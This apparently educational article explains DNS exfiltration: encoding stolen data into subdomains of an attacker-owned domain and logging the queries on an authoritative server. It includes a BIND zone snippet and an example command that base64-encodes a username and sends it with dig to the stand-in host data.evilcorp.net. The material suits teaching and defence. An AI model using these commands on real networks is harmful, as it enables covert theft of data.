DNS exfiltration is a stealthy way to steal data by encoding it within DNS queries.
Imagine you need to send a secret message, but you can only communicate by asking questions about domain names. DNS exfiltration works by breaking down sensitive data into small chunks, encoding each chunk into a subdomain of a specially crafted domain name, and then sending that as a DNS query. The attacker controls the DNS server that these queries are sent to, allowing them to capture and reassemble the data.
Here’s how it looks in practice. An attacker on a compromised network wants to steal a list of usernames. They might take a list like:
alice
bob
charlie
david
And encode each name into a subdomain. For instance, if they’re using Base64 encoding, 'alice' might become 'YWxpY2U='. The full query could look like YWxpY2U=.attacker.com. The DNS server for attacker.com receives this query, logs the subdomain YWxpY2U=, and the attacker can then decode it on their end.
This process repeats for every chunk of data. The attacker sets up a DNS server (often a subdomain of a domain they own, like data.evilcorp.net) and configures their malicious software on the victim’s network to send queries to it.
The attacker’s setup might involve:
- A malicious DNS server: This is the command-and-control (C2) server that receives the exfiltrated data. It’s typically a server running standard DNS software (like BIND or dnsmasq) configured to log all incoming queries.
# Example BIND zone file snippet for attacker.com @ IN SOA ns1.attacker.com. hostmaster.attacker.com. ( 2023102701 ; serial 3600 ; refresh 1800 ; retry 604800 ; expire 86400 ) ; minimum TTL @ IN NS ns1.attacker.com. ns1 IN A 192.0.2.10 # Attacker's DNS server IP - A DNS tunneling client: This is the software running on the compromised host that crafts and sends the DNS queries containing the encoded data. Tools like
iodineor custom scripts can achieve this.# Example of data being encoded and sent via DNS query (conceptual) echo "alice" | base64 # Output: YWxpY2U= dig YWxpY2U=.data.evilcorp.net +short # The attacker's DNS server logs: YWxpY2U=.data.evilcorp.net - A DNS tunneling server (on the victim’s network): This could be a compromised machine or a legitimate system that’s been tricked into sending queries to the attacker’s DNS server.
The system works because DNS is a fundamental part of internet infrastructure, and its queries are often allowed through firewalls with minimal inspection. Standard DNS traffic (UDP/TCP port 53) is usually permitted outbound, making it an ideal channel for covert communication. The attacker’s DNS server simply acts as a logging endpoint for these specially crafted queries.
The attacker controls the entire process by owning the domain (evilcorp.net in the example) and having a DNS server authoritative for it. When a DNS resolver on the victim’s network needs to resolve YWxpY2U=.data.evilcorp.net, it eventually queries the attacker’s authoritative DNS server. This server, by design, logs the query and doesn’t actually resolve the name to an IP address, effectively just receiving the encoded data.
The key levers an attacker controls are the encoding method (Base64, hex, etc.), the chunk size of data per query, and the choice of domain to use for exfiltration. The victim’s network configuration, specifically how DNS traffic is handled and monitored, determines how easily this can occur.
Here’s a common misconception: people often think DNS tunneling is only about establishing a reverse shell. While that’s a use case, the primary mechanism here is data exfiltration. The attacker isn’t necessarily trying to control the compromised machine interactively; they are simply trying to get data out. The DNS queries themselves are the data transfer mechanism, not necessarily the command channel.
The most surprising thing about DNS exfiltration is how little actual "tunneling" is happening in many implementations. The attacker’s DNS server often doesn’t even respond with a valid IP address; it just logs the query. The "tunnel" is conceptual – a path for data disguised as legitimate DNS requests, leveraging the fact that DNS traffic is rarely inspected deeply by network security devices.
The next problem you’ll encounter after understanding DNS exfiltration is detecting the sheer volume of DNS traffic that can be generated by this method.